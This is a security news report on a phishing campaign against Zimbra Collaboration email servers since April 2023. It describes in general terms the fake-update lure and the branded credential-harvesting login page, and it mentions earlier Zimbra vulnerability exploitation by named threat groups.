Since April 2023, an ongoing phishing campaign has been actively targeting Zimbra Collaboration email servers globally, as reported by researchers. The campaign operates by sending phishing emails to various organizations worldwide, with no specific sector or entity being singled out. The identity of the threat actor responsible for this campaign remains undisclosed at present.
The attack methodology involves sending phishing emails to potential victims, impersonating administrators from organizations. These emails notify recipients of an impending email server update that will lead to temporary account deactivation. Recipients are instructed to open an attached HTML file to receive details about the server upgrade and instructions on how to prevent account deactivation.
Upon opening the HTML attachment, a counterfeit Zimbra login page is presented. This fake page is meticulously designed to feature the logo and branding of the targeted company, adding an air of authenticity. Additionally, the username field in the login form will be prefilled, further convincing the targets of its legitimacy.
Passwords entered in the phishing form are transmitted to the threat actor’s server via an HTTPS POST request. In certain cases, compromised administrator accounts are exploited to establish new mailboxes, which are then used to disseminate phishing emails to other members of the organization.
“One explanation is that the adversary relies on password reuse by the administrator targeted through phishing – i.e., using the same credentials for both email and administration. From available data we are not able to confirm this hypothesis.”
Despite the campaign’s lack of sophisticated tactics, its reach and success are noteworthy. Researchers emphasize that users of Zimbra Collaboration should be cautious of this threat. Zimbra Collaboration email servers are commonly targeted by hackers for activities like cyber espionage, which involves collecting internal communications, or as an initial entry point to infiltrate the target organization’s network.
Earlier in the year, another analysis revealed the ‘Winter Vivern’ hacking group’s exploitation of a Zimbra Collaboration vulnerability (CVE-2022-27926) to gain access to webmail portals of NATO-aligned organizations, governments, diplomats, and military personnel. In a previous instance, a threat actor named ‘TEMP_Heretic’ utilized a zero-day flaw (CVE-2022-23682) in the Zimbra Collaboration product for mailbox access and lateral phishing attacks.
“The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries”
In conclusion, the attractiveness of Zimbra Collaboration among organizations with constrained IT budgets continues to make it a sought-after target for adversaries, underscoring the importance of heightened awareness and proactive defense against such phishing campaigns.